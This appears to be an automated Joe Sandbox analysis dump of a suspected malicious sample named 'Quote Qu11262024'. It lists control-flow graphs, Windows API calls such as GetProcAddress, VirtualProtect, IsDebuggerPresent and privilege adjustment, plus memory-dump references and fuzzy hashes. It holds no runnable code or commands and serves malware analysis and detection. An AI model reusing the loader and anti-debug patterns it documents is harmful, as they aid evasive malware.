                                                                                                    control_flow_graph 79 3714c7a7-3714c7bc 80 3714c82d 79->80 81 3714c7be-3714c7c6 79->81 83 3714c82f-3714c833 80->83 81->80 82 3714c7c8-3714c7f6 call 3714c7e6 81->82 90 3714c86c-3714c86e 82->90 91 3714c7f8 82->91 85 3714c835-3714c83d GetModuleHandleA 83->85 86 3714c872 call 3714c877 83->86 89 3714c83f-3714c847 85->89 89->89 92 3714c849-3714c84c 89->92 96 3714c866-3714c86b 90->96 97 3714c870 90->97 94 3714c7fa-3714c7fe 91->94 95 3714c85b-3714c85e 91->95 92->83 93 3714c84e-3714c850 92->93 98 3714c856-3714c85a 93->98 99 3714c852-3714c854 93->99 102 3714c865 94->102 103 3714c800-3714c80b GetProcAddress 94->103 100 3714c85f-3714c860 GetProcAddress 95->100 96->90 97->92 98->95 99->100 100->102 102->96 103->80 104 3714c80d-3714c81a VirtualProtect 103->104 105 3714c82c 104->105 106 3714c81c-3714c82a VirtualProtect 104->106 105->80 106->105
                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(?,3714C7DD), ref: 3714C838
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 3714C860
                                                                                                      • Part of subcall function 3714C7E6: GetModuleHandleA.KERNEL32(3714C7DD), ref: 3714C7E6
                                                                                                      • Part of subcall function 3714C7E6: GetProcAddress.KERNEL32(00000000,3714C7F4), ref: 3714C804
                                                                                                      • Part of subcall function 3714C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,3714C7F4,3714C7DD), ref: 3714C816
                                                                                                      • Part of subcall function 3714C7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,3714C7F4,3714C7DD), ref: 3714C82A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.4635689631.0000000037141000.00000040.00001000.00020000.00000000.sdmp, Offset: 37140000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.4635673088.0000000037140000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4635689631.0000000037156000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_37140000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 2099061454-0
                                                                                                    • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                    • Instruction ID: 0c641e34c9a9328cc487ca641847afeb4cfb108eb13298b82df9f6cf642cfaed
                                                                                                    • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                    • Instruction Fuzzy Hash: 342136775093836FF7128F74CC02BA67FF99B232B0F190696D044CB183D6A89446C3A6

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 107 3714c803-3714c80b GetProcAddress 108 3714c82d 107->108 109 3714c80d-3714c81a VirtualProtect 107->109 112 3714c82f-3714c833 108->112 110 3714c82c 109->110 111 3714c81c-3714c82a VirtualProtect 109->111 110->108 111->110 113 3714c835-3714c83d GetModuleHandleA 112->113 114 3714c872 call 3714c877 112->114 116 3714c83f-3714c847 113->116 116->116 117 3714c849-3714c84c 116->117 117->112 118 3714c84e-3714c850 117->118 119 3714c856-3714c85e 118->119 120 3714c852-3714c854 118->120 121 3714c85f-3714c865 GetProcAddress 119->121 120->121 124 3714c866-3714c86e 121->124 126 3714c870 124->126 126->117
                                                                                                    APIs
                                                                                                    • GetProcAddress.KERNEL32(00000000,3714C7F4), ref: 3714C804
                                                                                                    • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,3714C7F4,3714C7DD), ref: 3714C816
                                                                                                    • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,3714C7F4,3714C7DD), ref: 3714C82A
                                                                                                    • GetModuleHandleA.KERNEL32(?,3714C7DD), ref: 3714C838
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 3714C860
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.4635689631.0000000037141000.00000040.00001000.00020000.00000000.sdmp, Offset: 37140000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.4635673088.0000000037140000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4635689631.0000000037156000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_37140000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProcProtectVirtual$HandleModule
                                                                                                    • String ID:
                                                                                                    • API String ID: 2152742572-0
                                                                                                    • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                    • Instruction ID: 278219ad12e29fa60b3a10e95985ecca9ea702025eeca11378156b49dfb8261d
                                                                                                    • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                    • Instruction Fuzzy Hash: 07F0F6A76453433CFA124EB48C43EF65FFD8B376B0B101A56E104C7183DA95850683F6

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 136 403328-403367 SetErrorMode GetVersion 137 403369-403371 call 40646c 136->137 138 40337a 136->138 137->138 143 403373 137->143 139 40337f-403392 call 4063fe lstrlenA 138->139 145 403394-4033b0 call 40646c * 3 139->145 143->138 152 4033c1-40341f #17 OleInitialize SHGetFileInfoA call 4060d4 GetCommandLineA call 4060d4 145->152 153 4033b2-4033b8 145->153 160 403421-403426 152->160 161 40342b-403440 call 405a97 CharNextA 152->161 153->152 157 4033ba 153->157 157->152 160->161 164 403505-403509 161->164 165 403445-403448 164->165 166 40350f 164->166 167 403450-403458 165->167 168 40344a-40344e 165->168 169 403522-40353c GetTempPathA call 4032f7 166->169 171 403460-403463 167->171 172 40345a-40345b 167->172 168->167 168->168 178 403594-4035ae DeleteFileA call 402db3 169->178 179 40353e-40355c GetWindowsDirectoryA lstrcatA call 4032f7 169->179 174 4034f5-403502 call 405a97 171->174 175 403469-40346d 171->175 172->171 174->164 193 403504 174->193 176 403485-4034b2 175->176 177 40346f-403475 175->177 183 4034b4-4034ba 176->183 184 4034c5-4034f3 176->184 181 403477-403479 177->181 182 40347b 177->182 195 403642-403652 call 403810 OleUninitialize 178->195 196 4035b4-4035ba 178->196 179->178 194 40355e-40358e GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 4032f7 179->194 181->176 181->182 182->176 188 4034c0 183->188 189 4034bc-4034be 183->189 184->174 191 403511-40351d call 4060d4 184->191 188->184 189->184 189->188 191->169 193->164 194->178 194->195 206 403776-40377c 195->206 207 403658-403668 call 4057f0 ExitProcess 195->207 200 403632-40363e call 403902 196->200 201 4035bc-4035c7 call 405a97 196->201 200->195 210 4035c9-4035f2 201->210 211 4035fd-403607 201->211 213 4037f8-403800 206->213 214 40377e-403797 GetCurrentProcess OpenProcessToken 206->214 215 4035f4-4035f6 210->215 218 403609-403616 call 405b5a 211->218 219 40366e-403682 call 40575b lstrcatA 211->219 216 403802 213->216 217 403806-40380a ExitProcess 213->217 221 4037c9-4037d7 call 40646c 214->221 222 403799-4037c3 LookupPrivilegeValueA AdjustTokenPrivileges 214->222 215->211 223 4035f8-4035fb 215->223 216->217 218->195 230 403618-40362e call 4060d4 * 2 218->230 231 403684-40368a lstrcatA 219->231 232 40368f-4036a9 lstrcatA lstrcmpiA 219->232 233 4037e5-4037ef ExitWindowsEx 221->233 234 4037d9-4037e3 221->234 222->221 223->211 223->215 230->200 231->232 232->195 237 4036ab-4036ae 232->237 233->213 235 4037f1-4037f3 call 40140b 233->235 234->233 234->235 235->213 240 4036b0-4036b5 call 4056c1 237->240 241 4036b7 call 40573e 237->241 246 4036bc-4036c9 SetCurrentDirectoryA 240->246 241->246 249 4036d6-4036fe call 4060d4 246->249 250 4036cb-4036d1 call 4060d4 246->250 254 403704-403720 call 4060f6 DeleteFileA 249->254 250->249 257 403761-403768 254->257 258 403722-403732 CopyFileA 254->258 257->254 259 40376a-403771 call 405eb3 257->259 258->257 260 403734-403754 call 405eb3 call 4060f6 call 405773 258->260 259->195 260->257 269 403756-40375d CloseHandle 260->269 269->257
                                                                                                    APIs
                                                                                                    • SetErrorMode.KERNEL32 ref: 0040334D
                                                                                                    • GetVersion.KERNEL32 ref: 00403353
                                                                                                    • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403386
                                                                                                    • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 004033C2
                                                                                                    • OleInitialize.OLE32(00000000), ref: 004033C9
                                                                                                    • SHGetFileInfoA.SHELL32(0041FCF0,00000000,?,00000160,00000000,?,00000006,00000008,0000000A), ref: 004033E5
                                                                                                    • GetCommandLineA.KERNEL32(00423F20,NSIS Error,?,00000006,00000008,0000000A), ref: 004033FA
                                                                                                    • CharNextA.USER32(00000000,0042A000,00000020,0042A000,00000000,?,00000006,00000008,0000000A), ref: 00403436
                                                                                                    • GetTempPathA.KERNEL32(00000400,0042B400,00000000,00000020,?,00000006,00000008,0000000A), ref: 00403533
                                                                                                    • GetWindowsDirectoryA.KERNEL32(0042B400,000003FB,?,00000006,00000008,0000000A), ref: 00403544
                                                                                                    • lstrcatA.KERNEL32(0042B400,\Temp,?,00000006,00000008,0000000A), ref: 00403550
                                                                                                    • GetTempPathA.KERNEL32(000003FC,0042B400,0042B400,\Temp,?,00000006,00000008,0000000A), ref: 00403564
                                                                                                    • lstrcatA.KERNEL32(0042B400,Low,?,00000006,00000008,0000000A), ref: 0040356C
                                                                                                    • SetEnvironmentVariableA.KERNEL32(TEMP,0042B400,0042B400,Low,?,00000006,00000008,0000000A), ref: 0040357D
                                                                                                    • SetEnvironmentVariableA.KERNEL32(TMP,0042B400,?,00000006,00000008,0000000A), ref: 00403585
                                                                                                    • DeleteFileA.KERNEL32(0042B000,?,00000006,00000008,0000000A), ref: 00403599
                                                                                                      • Part of subcall function 0040646C: GetModuleHandleA.KERNEL32(?,?,?,0040339B,0000000A), ref: 0040647E
                                                                                                      • Part of subcall function 0040646C: GetProcAddress.KERNEL32(00000000,?), ref: 00406499
                                                                                                      • Part of subcall function 00403902: lstrlenA.KERNEL32(004236C0,?,?,?,004236C0,00000000,0042A400,0042B000,00420D30,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420D30,00000000,00000002,76233410), ref: 004039F2
                                                                                                      • Part of subcall function 00403902: lstrcmpiA.KERNEL32(?,.exe), ref: 00403A05
                                                                                                      • Part of subcall function 00403902: GetFileAttributesA.KERNEL32(004236C0), ref: 00403A10
                                                                                                      • Part of subcall function 00403902: LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,0042A400), ref: 00403A59
                                                                                                      • Part of subcall function 00403902: RegisterClassA.USER32(00423EC0), ref: 00403A96
                                                                                                      • Part of subcall function 00403810: CloseHandle.KERNEL32(FFFFFFFF,0042B400,00403647,?,?,00000006,00000008,0000000A), ref: 00403822
                                                                                                      • Part of subcall function 00403810: CloseHandle.KERNEL32(FFFFFFFF,0042B400,00403647,?,?,00000006,00000008,0000000A), ref: 00403836
                                                                                                    • OleUninitialize.OLE32(?,?,00000006,00000008,0000000A), ref: 00403647
                                                                                                    • ExitProcess.KERNEL32 ref: 00403668
                                                                                                    • GetCurrentProcess.KERNEL32(00000028,?,00000006,00000008,0000000A), ref: 00403785
                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 0040378C
                                                                                                    • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004037A4
                                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004037C3
                                                                                                    • ExitWindowsEx.USER32(00000002,80040002), ref: 004037E7
                                                                                                    • ExitProcess.KERNEL32 ref: 0040380A
                                                                                                      • Part of subcall function 004057F0: MessageBoxIndirectA.USER32(0040A230), ref: 0040584B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.4604206586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.4604186321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605360249.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605386033.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605408589.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$ExitFileHandle$CloseEnvironmentPathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpi
                                                                                                    • String ID: "$.tmp$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                    • API String ID: 538718688-3941163293
                                                                                                    • Opcode ID: 6d641f63953c5a3b5057b23d4bd1604e14bbc02953cb71ced9b3370a5dcece77
                                                                                                    • Instruction ID: f0ad904c17b6b0a615759e776a9b626e87a37abdf880564aefc6f329476caeff
                                                                                                    • Opcode Fuzzy Hash: 6d641f63953c5a3b5057b23d4bd1604e14bbc02953cb71ced9b3370a5dcece77
                                                                                                    • Instruction Fuzzy Hash: 79C1F6702047506AD721AF759D99B2B3EA8EB81706F05443FF581B61E2CB7C8A158B2F

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 321 404b78-404bc4 GetDlgItem * 2 322 404de4-404deb 321->322 323 404bca-404c5e GlobalAlloc LoadBitmapA SetWindowLongA ImageList_Create ImageList_AddMasked SendMessageA * 2 321->323 324 404ded-404dfd 322->324 325 404dff 322->325 326 404c60-404c6b SendMessageA 323->326 327 404c6d-404c74 DeleteObject 323->327 328 404e02-404e0b 324->328 325->328 326->327 329 404c76-404c7e 327->329 330 404e16-404e1c 328->330 331 404e0d-404e10 328->331 332 404c80-404c83 329->332 333 404ca7-404cab 329->333 337 404e2b-404e32 330->337 338 404e1e-404e25 330->338 331->330 334 404efa-404f01 331->334 335 404c85 332->335 336 404c88-404ca5 call 4060f6 SendMessageA * 2 332->336 333->329 339 404cad-404cd9 call 404173 * 2 333->339 344 404f72-404f7a 334->344 345 404f03-404f09 334->345 335->336 336->333 341 404e34-404e37 337->341 342 404ea7-404eaa 337->342 338->334 338->337 381 404da3-404db6 GetWindowLongA SetWindowLongA 339->381 382 404cdf-404ce5 339->382 350 404e42-404e57 call 404ac6 341->350 351 404e39-404e40 341->351 342->334 346 404eac-404eb6 342->346 348 404f84-404f8b 344->348 349 404f7c-404f82 SendMessageA 344->349 353 40515a-40516c call 4041da 345->353 354 404f0f-404f19 345->354 356 404ec6-404ed0 346->356 357 404eb8-404ec4 SendMessageA 346->357 358 404f8d-404f94 348->358 359 404fbf-404fc6 348->359 349->348 350->342 380 404e59-404e6a 350->380 351->342 351->350 354->353 362 404f1f-404f2e SendMessageA 354->362 356->334 365 404ed2-404edc 356->365 357->356 366 404f96-404f97 ImageList_Destroy 358->366 367 404f9d-404fa4 358->367 370 40511c-405123 359->370 371 404fcc-404fd8 call 4011ef 359->371 362->353 363 404f34-404f45 SendMessageA 362->363 373 404f47-404f4d 363->373 374 404f4f-404f51 363->374 376 404eed-404ef7 365->376 377 404ede-404eeb 365->377 366->367 378 404fa6-404fa7 GlobalFree 367->378 379 404fad-404fb9 367->379 370->353 375 405125-40512c 370->375 391 404fe8-404feb 371->391 392 404fda-404fdd 371->392 373->374 384 404f52-404f6b call 401299 SendMessageA 373->384 374->384 375->353 385 40512e-405158 ShowWindow GetDlgItem ShowWindow 375->385 376->334 377->334 378->379 379->359 380->342 387 404e6c-404e6e 380->387 386 404dbc-404dc0 381->386 388 404ce8-404cee 382->388 384->344 385->353 394 404dc2-404dd5 ShowWindow call 4041a8 386->394 395 404dda-404de2 call 4041a8 386->395 396 404e70-404e77 387->396 397 404e81 387->397 389 404d84-404d97 388->389 390 404cf4-404d1c 388->390 389->388 404 404d9d-404da1 389->404 398 404d56-404d58 390->398 399 404d1e-404d54 SendMessageA 390->399 405 40502c-405050 call 4011ef 391->405 406 404fed-405006 call 4012e2 call 401299 391->406 401 404fe0-404fe3 call 404b46 392->401 402 404fdf 392->402 394->353 395->322 409 404e79-404e7b 396->409 410 404e7d-404e7f 396->410 400 404e84-404ea0 call 40117d 397->400 411 404d5a-404d69 SendMessageA 398->411 412 404d6b-404d81 SendMessageA 398->412 399->389 400->342 401->391 402->401 404->381 404->386 423 4050f2-405106 InvalidateRect 405->423 424 405056 405->424 428 405016-405025 SendMessageA 406->428 429 405008-40500e 406->429 409->400 410->400 411->389 412->389 423->370 427 405108-405117 call 404a99 call 404a81 423->427 425 405059-405064 424->425 430 405066-405075 425->430 431 4050da-4050ec 425->431 427->370 428->405 436 405010 429->436 437 405011-405014 429->437 434 405077-405084 430->434 435 405088-40508b 430->435 431->423 431->425 434->435 439 405092-40509b 435->439 440 40508d-405090 435->440 436->437 437->428 437->429 441 4050a0-4050d8 SendMessageA * 2 439->441 442 40509d 439->442 440->441 441->431 442->441
                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32(?,000003F9), ref: 00404B90
                                                                                                    • GetDlgItem.USER32(?,00000408), ref: 00404B9B
                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 00404BE5
                                                                                                    • LoadBitmapA.USER32(0000006E), ref: 00404BF8
                                                                                                    • SetWindowLongA.USER32(?,000000FC,0040516F), ref: 00404C11
                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404C25
                                                                                                    • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404C37
                                                                                                    • SendMessageA.USER32(?,00001109,00000002), ref: 00404C4D
                                                                                                    • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404C59
                                                                                                    • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404C6B
                                                                                                    • DeleteObject.GDI32(00000000), ref: 00404C6E
                                                                                                    • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404C99
                                                                                                    • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404CA5
                                                                                                    • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404D3A
                                                                                                    • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404D65
                                                                                                    • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404D79
                                                                                                    • GetWindowLongA.USER32(?,000000F0), ref: 00404DA8
                                                                                                    • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404DB6
                                                                                                    • ShowWindow.USER32(?,00000005), ref: 00404DC7
                                                                                                    • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404EC4
                                                                                                    • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404F29
                                                                                                    • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404F3E
                                                                                                    • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404F62
                                                                                                    • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404F82
                                                                                                    • ImageList_Destroy.COMCTL32(?), ref: 00404F97
                                                                                                    • GlobalFree.KERNEL32(?), ref: 00404FA7
                                                                                                    • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00405020
                                                                                                    • SendMessageA.USER32(?,00001102,?,?), ref: 004050C9
                                                                                                    • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 004050D8
                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 004050F8
                                                                                                    • ShowWindow.USER32(?,00000000), ref: 00405146
                                                                                                    • GetDlgItem.USER32(?,000003FE), ref: 00405151
                                                                                                    • ShowWindow.USER32(00000000), ref: 00405158
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.4604206586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.4604186321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605360249.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605386033.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605408589.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                    • String ID: $M$N
                                                                                                    • API String ID: 1638840714-813528018
                                                                                                    • Opcode ID: 023d2cb67f3d6d7b7a10b8a2d87b3e072ab11262ffbffbae51079be6f5d2e668
                                                                                                    • Instruction ID: 91a4408178b324c60ce093aa3ae08ac9a812c52c8545325903dbdedbb0e7fd5b
                                                                                                    • Opcode Fuzzy Hash: 023d2cb67f3d6d7b7a10b8a2d87b3e072ab11262ffbffbae51079be6f5d2e668
                                                                                                    • Instruction Fuzzy Hash: D3024FB0A00209EFEB209F94DD45AAE7BB5FB84315F10413AF614BA2E1D7789D42DF58
                                                                                                    APIs
                                                                                                    • DeleteFileA.KERNEL32(?,?,76233410,76232EE0,00000000), ref: 004058C5
                                                                                                    • lstrcatA.KERNEL32(00421D38,\*.*,00421D38,?,?,76233410,76232EE0,00000000), ref: 0040590D
                                                                                                    • lstrcatA.KERNEL32(?,0040A014,?,00421D38,?,?,76233410,76232EE0,00000000), ref: 0040592E
                                                                                                    • lstrlenA.KERNEL32(?,?,0040A014,?,00421D38,?,?,76233410,76232EE0,00000000), ref: 00405934
                                                                                                    • FindFirstFileA.KERNEL32(00421D38,?,?,?,0040A014,?,00421D38,?,?,76233410,76232EE0,00000000), ref: 00405945
                                                                                                    • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 004059F2
                                                                                                    • FindClose.KERNEL32(00000000), ref: 00405A03
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.4604206586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.4604186321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605360249.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605386033.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605408589.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                    • String ID: \*.*
                                                                                                    • API String ID: 2035342205-1173974218
                                                                                                    • Opcode ID: c9732bbc8ed75031154b942d8fc9038be06ce12fb9f9a4776320fb91deaa52c0
                                                                                                    • Instruction ID: a6b31b96a3193368f0c726ff4b29e15ec2653ad771cccf2a3f4b6633d6870341
                                                                                                    • Opcode Fuzzy Hash: c9732bbc8ed75031154b942d8fc9038be06ce12fb9f9a4776320fb91deaa52c0
                                                                                                    • Instruction Fuzzy Hash: B651B171940A14AADB21AB61CC85BBF7A78DF46724F14823BF441B51D2C73C4A82DF69
                                                                                                    APIs
                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 371461DA
                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 371461E4
                                                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 371461F1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.4635689631.0000000037141000.00000040.00001000.00020000.00000000.sdmp, Offset: 37140000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.4635673088.0000000037140000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4635689631.0000000037156000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_37140000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                    • String ID:
                                                                                                    • API String ID: 3906539128-0
                                                                                                    • Opcode ID: e194eebc64f2a95c9b006f17492b15948b5ca17ec3a3efabb8e8acab6e2e1290
                                                                                                    • Instruction ID: 6c60361eab823d74dd1fb3ba33f6679c3c67a874d4d374341acd65d5082cf59a
                                                                                                    • Opcode Fuzzy Hash: e194eebc64f2a95c9b006f17492b15948b5ca17ec3a3efabb8e8acab6e2e1290
                                                                                                    • Instruction Fuzzy Hash: B431E5B595122CABCB61DF24D988B8DBBB8BF08310F5041EAE91CA7250E7349BD18F45
                                                                                                    APIs
                                                                                                    • GetCurrentProcess.KERNEL32(?,?,37144A8A,?,37152238,0000000C,37144BBD,00000000,00000000,00000001,37142082,37152108,0000000C,37141F3A,?), ref: 37144AD5
                                                                                                    • TerminateProcess.KERNEL32(00000000,?,37144A8A,?,37152238,0000000C,37144BBD,00000000,00000000,00000001,37142082,37152108,0000000C,37141F3A,?), ref: 37144ADC
                                                                                                    • ExitProcess.KERNEL32 ref: 37144AEE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.4635689631.0000000037141000.00000040.00001000.00020000.00000000.sdmp, Offset: 37140000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.4635673088.0000000037140000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4635689631.0000000037156000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_37140000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                    • String ID:
                                                                                                    • API String ID: 1703294689-0
                                                                                                    • Opcode ID: da481283a930881a87299bd1e015fa1f1349326a6b40a9a7667d743b54ae313f
                                                                                                    • Instruction ID: e4cdd034b8a14706fde1dd25fec8f31e624d5953421e9e669a1e20699a02b955
                                                                                                    • Opcode Fuzzy Hash: da481283a930881a87299bd1e015fa1f1349326a6b40a9a7667d743b54ae313f
                                                                                                    • Instruction Fuzzy Hash: 54E04637040208AFCF126F64CD0DA493B3AEF407A5BA14010FE49AB120CB39ED53DB44
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.4635689631.0000000037141000.00000040.00001000.00020000.00000000.sdmp, Offset: 37140000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.4635673088.0000000037140000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4635689631.0000000037156000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_37140000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HeapProcess
                                                                                                    • String ID:
                                                                                                    • API String ID: 54951025-0
                                                                                                    • Opcode ID: ca51bcafa848f45d7c084e4b8d6d04dd6644cf398a837398dc80023a2b0f5d69
                                                                                                    • Instruction ID: 2f743b55073592cffd8d6130afdf82094429f7be2cd1e5d723c2116095a8f3ee
                                                                                                    • Opcode Fuzzy Hash: ca51bcafa848f45d7c084e4b8d6d04dd6644cf398a837398dc80023a2b0f5d69
                                                                                                    • Instruction Fuzzy Hash: A4A012322401028F4B048E30420F20C35BC654419034100596508E3000E72880224701

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
